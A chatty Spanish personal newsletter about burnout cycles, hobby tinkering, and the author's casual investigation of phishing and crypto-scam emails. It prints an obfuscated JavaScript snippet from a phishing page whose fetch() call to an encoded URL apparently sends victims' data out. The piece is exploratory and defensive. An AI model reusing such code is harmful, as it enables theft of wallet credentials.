Uf, me apetece entre poco y nada escribir, ¿sabes?

Yo es que voy muy por ciclos. Me menstrúa el cerebro, creo. Perdón por la frase.

El otro día sentado en la taza estaba mirando shorts del Tubo y me salió un clip de una entrevista a Mr Beast. Para los boomers que no sepáis, es un chaval que hace chorrivídeos pero con la tontería tiene casi 300 millones de suscriptores en varios canales y redes sociales.

Y sí, el contenido son paridas y absurdidades, pero el tío curra 24/7. Y en el clip comentaba su forma de hacerlo: no tiene horarios, curra todo el día mientras esté despierto, lunes a domingo, hasta que revienta. Le pega un bajonazo de burnout y desconecta del mundo 12-36h. Y con esto se recupera y vuelve al lío.

Me gustó porque va muy en contra de lo que todos los gurús de enriquecerse y el lifestyle te dicen de tener claros los horarios, separar el trabajo y la vida personal, no trabajar en fines de semana, las vacaciones sin portátil. A este toda esa movida se la pela.

A ver, que también es verdad que tiene 25 años, es milmillonario y no tiene más obligaciones que hacer cosas absurdas y drogarse (supongo). Pero en cierta forma me recuerda a lo que a mi me va bien, que es precisamente eso: currar a fondo cuando me apetece, sin pensarlo, y cuando me salta el diferencial desconectar el tiempo que necesite hasta que se me enfríe el circuito.

Lo que pasa es que no puedo hacerlo, por aquello de vivir en sociedad y tener una familia y otros marrones en los que me he metido yo solo por puro vicio sociobiológico. Así que hago caso a los gurús y me hago horarios y esas cosas.

Pero la verdad de fondo del ciclo de productividad/quemazo continúa ahí y es perfectamente visible:

Estas son las últimas 14 semanas, sacadas directamente de la herramienta que uso para gestionar mi tiempo. Cada columna, el total de horas que he hecho en esa semana. Es flipante lo claro que es este ciclo de productividad/bajón. Y está bastante claro también que estoy ahora mismo en la parte baja.

Ya sabes, conócete a ti mismo.

Pues aquí me tenéis. Me lloran los ojos del sueño que tengo. Tengo varios temas que atender con cierta urgencia. Pero estoy tan cansado de la vida que prefiero escribir la newsletter antes que enfrentarme a todo lo demás que tengo encima de la mesa.

Porque ese es un poco el truco. Cuando no te apetece hacer nada, hay dos posibilidades:

1. Que puedes permitirte no hacer nada

2. Que no

Si es la primera, you win. Al sofá. Y si es la segunda, busca qué es lo menos malo. La cosa que menos pereza te da hacer pero que, si la haces, cuenta como un check ✅ de tu lista de tareas.

Haz eso.

Y eso estoy haciendo. La newsletter.

Hoy vamos a hablar de ser un teenager.

🏡 Estar de Rodríguez

La expresión en sí ya es durilla. Que por cierto viene de una peli del 65, El cálido verano del señor Rodríguez, en la que un señoro se queda solo en su casa durante el verano.

El caso es que este fin de semana pasado he estado, indeed, de Rodríguez. Solo, en mi casa, de jueves a lunes. Y lo normal en estas situaciones hubiese sido o bien trabajar, o bien estarme de farra día sí día también, o bien haberme pasado el Netflix o, incluso, haberme ido con la sueca como se hacía en los sesenta.

Pero por lo que sea me ha salido por involucionar hacia mi estado teenager que en resumen es hacer el freak en mi casa. En concreto:

• Me he montado un servidor de archivos, incluyendo cambiar todos los ventiladores por Noctua ultra-silenciosos, trabajo que incluyó soldadura y modding de caja.

• He reinstalado y puesto a punto un iMac para mi señora.

• Le he metido Windows 11 a mi portátil gamer para poder jugar al Age of Empires a gusto.

• He instalado Linux en otro portátil para resolver la situación de la semana pasada en la que no tenía ningún PC suficientemente sandboxeado para abrir links sospechosos.

• He arreglado unos auriculares inalámbricos de Samsung que no habían funcionado nunca por motivos misteriosos.

• Le he cambiado la cámara a mi iPhone antiguo para hacerlo funcional.

Ha sido maravilloso. Volver a la infancia, rodeado de trastos, cables, olor a vapores de plomo y flux. Pasar las horas delante de un framebuffer instalando Linux desde cero. Gastar dinero en hardware y meterlo como gasto de empresa.

El caso es que entre lo de la semana pasada con el phishing y esto de estar trasteando con maquinitas me ha devuelto la ilusión por aprender informática. Y en particular los entresijos de la seguridad, que tenía ya bastante abandonados. Y me he puesto a leer el spam que me llega.

📧 Ham or Spam

Algunos son preocupantemente acertados:

Pero por lo general son burdos casos de phishing. Uno de ellos es bastante conocido en el mundillo este, un texto genérico con el que te dicen que te han hackeado y que tienen vídeos tuyos meneándote la pilila y que se los van a enviar a tu abuela si no les envías unos bitcoins. Por lo general no tienen mucha gracia porque no hay enlaces ni hackeos interesantes, sólo esperan que te de canguelo y les pagues los $1.450 que te piden.

Pero bueno, que no caería nadie en algo tan burdo, ¿no?

Tenemos un solo dato: la dirección de Bitcoin donde debería ingresar la extorsión. ¿Habrá alguna transacción entrante?

Wooops.

Pues sí que caen, sí. Dos, por lo menos, en esta dirección, de las quien sabe cuantas miles de wallets que usarán éstos. Deprimente el asunto.

Seguimos mirando el spam.

Otro de cryptobros, este es uno que te dicen que “tienes que clarificar una transacción en el Blockchain que has hecho”. ¿Dafuq?

Hay un link de un acortador que probablemente me hackeará el pece entero. Pero como de costumbre, lo descargo con curl. Ahora el atacante ya sabe que lo he abierto. Doble emoción. Me redirecciona a una URL muy turbia.

Por lo visto el glitch.me este es un servicio real: “The friendly community where everyone builds the web”. No tan friendly.

Me la juego y accedo.

Pues vaya, poco misterio. Un formulario donde te piden que metas la back-up phrase de tu wallet. Para los no iniciados, son 12 palabras que se han usado para generar la clave privada de tu dirección de Bitcoin. Y que, con ellas, tienes acceso completo a la cuenta (¡y puedes vaciarla!).

Lo interesante es el action del formulario. ¿Qué habrá interesante ahí? El dominio mefrtey.online apunta a un hosting que está suspendido. Hace pocos días, en junio, devolvía un listing y estaba vacío 🤷‍♂️.

¿Y el subdominio? Las DNS van a la misma IP. Y redirige también a una página de página suspendida.

¿Y el PHP en sí? Le hago un POST y…

HTTP/2 302
content-type: text/html
content-length: 683
date: Tue, 18 Jul 2023 11:21:39 GMT
server: LiteSpeed
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: https://kap.mefrtey.online/cgi-sys/suspendedpage.cgi
x-turbo-charged-by: LiteSpeed

Ooooh, qué lástima. Suspendido también. Le han chapado el garito a nuestro juánquer. Parece que con éste no vamos a poder divertirnos.

Vamos a probar uno más, por las risas. Este es bastante fantasía. Un hipotético contable nos envía un documento para revisar. No hay adjunto, pero hay un enlace que está hecho para parecer un adjunto.

Ok, vamos a ver esos enlaces. Van a…. ¿¿IPFS??

IPFS es un sistema de almacenamiento de archivos distribuido. Algo así como Bittorrent, pero para alojar cosas como si fuese la web. Ha tenido un éxito escaso, excepto en el mundillo crypto/web3 y para Cloudflare, que le dio en 2018 por empezar a usarlo en sus sistemas y lanzó un gateway para acceder a contenido IPFS desde Internet en 2022.

Esto último es lo que están usando en este enlace. Ese churro enorme es un hash que identifica el contenido del fichero almacenado en la red.

Para lo que a nosotros concierne, nos lo podemos bajar a ver qué pasa y punto. Lo hago. Decepción:

/ipfs/bafybeicqhkjn3o3sjwi4xwmy3ipri72tpdsn32nrnbw4razh7m7td33gsu: content is unavailable because it violates the Cloudflare IPFS gateway's terms of service

Vaya lástima, de nuevo se nos han adelantado y han baneado al pobre juánquer que nos quería chorizar los duros.

Pero aquí sí tenemos alternativas. Porque IPFS, como Bittorrent, es distribuido e imposible de censurar. Sólo tenemos que encontrar otro gateway que no tenga escrúpulos. Parece que ipfs.io es uno de ellos. Nos hacemos con el archivo, que resulta ser un HTML, como era de esperar y…

Toneladas y toneladas de código mega ofuscado, funciones con nombres como _0xba58x4b o _0xba58x45.

Código tan bonito como este:

const _0xba58x45 = async(_0xba58x29, _0xba58x46, _0xba58x47, _0xba58x48 = _0x2bc3[151]) => {
                const _0xba58x49 = await fetch(atob(_0xba58x25 + _0xba58x26 + _0xba58x27 + _0xba58x28) + _0x2bc3[152] + _0xba58x24 + _0x2bc3[153] + _0xba58x29 + _0x2bc3[154] + _0xba58x46 + _0x2bc3[155] + _0xba58x47 + _0x2bc3[156] + _0xba58x48);
                console[_0x2bc3[9]](_0x2bc3[157])
            };

Tu ahí igual ves ruido. Yo veo horas de diversión. Horas de explorar.

De ser otra vez un teenager que va de hacker pero sin patines.

👋💣💨🧙‍♂️— Bomba de humo

Y esta diversión no te contaré hoy, porque no me da tiempo.

¿Emocionante, eh?

🤯.

Tal vez será a la próxima. Pero va a parecer esto que es una newsletter de seguridad informática.

Y no lo es. Te recuerdo que esta es una newsletter que se enorgullece de ser de chorradas.

Así que ya veremos.

Nos leemos pronto.